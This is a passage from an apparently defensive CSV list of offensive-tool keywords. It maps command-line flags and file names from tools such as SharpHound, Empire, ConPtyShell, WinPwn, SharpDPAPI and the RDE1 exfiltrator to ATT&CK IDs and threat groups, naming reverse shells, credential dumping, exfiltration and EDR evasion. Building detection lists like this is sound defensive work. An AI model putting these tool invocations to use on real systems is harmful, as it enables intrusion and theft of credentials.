Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Get-SPN.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* --collectionmethods ACL*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods ComputerOnly*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods Container*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - 
TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods DCOM,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods DCOnly*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods GPOLocalGroup*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods Group*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods LocalGroup*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods LoggedOn*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods ObjectProps*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - 
TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods PSRemote*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods RDP*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods Session*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --collectionmethods Trusts*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* com.blackh4t*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,0,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -* --command * --output payload*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,shell spawning,https://github.com/aStrowxyu/Pysoserial,1,0,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z -* -command *.exe* -technique ccmstp*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -* common_pass.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* ComputerDefaults.exe*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -* -ComputerName -ServiceEXE *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-PsExec.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* ComunicationC2.cpp*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -* -config modlishka.json *,offensive_tool_keyword,Modlishka ,Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.,T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002,TA0011 - TA0001 - TA0002 - TA0005 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/drk1wi/Modlishka,1,0,N/A,5,10,4434,854,2023-04-10T07:30:13Z,2018-12-19T15:59:54Z -* Configuring Windows Firewall rules to block EDR network access*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -* ConPtyShell*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation tools,https://github.com/antonioCoco/ConPtyShell,1,0,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -* -consoleoutput -browsercredentials*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation 
Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -* -consoleoutput -DomainRecon*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -* -consoleoutput -Localrecon*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -* -ConType bind *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-Vnc.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -ConType reverse *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-Vnc.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* --convert_idrsa_pub --publickey $HOME/.ssh/id_rsa.pub*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --copy-file --source-file *.docx --target-file *.docx --target-volume *,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense 
Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -* core.payload *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -* core.stager *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -* couchdb-databases.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* couchdb-stats.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --crack-status*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* --crawl=*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* crawler.py -u http*,offensive_tool_keyword,domain_analyzer,Analyze the security of any domain by finding all the information possible,T1560 - T1590 - T1200 - T1213 - T1057,TA0002 - TA0009,N/A,N/A,Information Gathering,https://github.com/eldraco/domain_analyzer,1,0,N/A,6,10,1831,259,2022-12-29T10:57:33Z,2017-08-08T18:52:34Z -* crde_arm_musl https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* crde_armv7 https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and 
server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* crde_debug https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* crde_linux https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* crde_linux_aarch64 https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* crde_linux_x86_64 https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* crde_macos https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* crde_release https 
-*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* crde_windows https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* crde_windows_x64 https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* crde_windows_x86 https -*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* --createpub -n 7828374823761928712873129873981723...12837182 -e 65537*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* Cred_Dump.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - 
TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -* credentials /pvk:*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -* creds-summary.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* CrossC2 Listener*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -* CrossC2.*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,0,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -* CrossC2Kit *,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
